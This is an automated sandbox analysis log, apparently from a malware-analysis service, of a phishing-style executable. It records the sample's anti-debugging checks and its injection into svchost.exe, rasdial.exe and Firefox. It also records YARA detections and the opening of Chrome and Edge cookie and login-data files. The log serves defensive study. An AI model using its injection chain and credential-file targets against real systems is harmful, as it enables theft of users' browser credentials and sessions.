            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]2_2_03952835
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_005F0B62
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005C2622
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005B083F
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B09D5 SetUnhandledExceptionFilter,0_2_005B09D5
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005B0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 6292Jump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F38008Jump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_005F1201
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005D2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005D2BA5
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FB226 SendInput,keybd_event,0_2_005FB226
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_006122DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_006122DA
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ STR-160-01.exe"Jump to behavior
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_005F0B62
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005F1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_005F1663
            Source: RFQ STR-160-01.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.3991059212.0000000000F91000.00000002.00000001.00040000.00000000.sdmp, MVaAnXtfZfwmI.exe, 00000006.00000000.2410746144.0000000000F91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: RFQ STR-160-01.exe, MVaAnXtfZfwmI.exe, 00000006.00000002.3991059212.0000000000F91000.00000002.00000001.00040000.00000000.sdmp, MVaAnXtfZfwmI.exe, 00000006.00000000.2410746144.0000000000F91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.3991059212.0000000000F91000.00000002.00000001.00040000.00000000.sdmp, MVaAnXtfZfwmI.exe, 00000006.00000000.2410746144.0000000000F91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.3991059212.0000000000F91000.00000002.00000001.00040000.00000000.sdmp, MVaAnXtfZfwmI.exe, 00000006.00000000.2410746144.0000000000F91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005B0698 cpuid 0_2_005B0698
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00608195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00608195
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005ED27A GetUserNameW,0_2_005ED27A
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005CB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_005CB952
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005942DE

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3995129739.0000000004D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490106320.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3994994966.0000000003430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490739625.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3995137235.0000000004360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
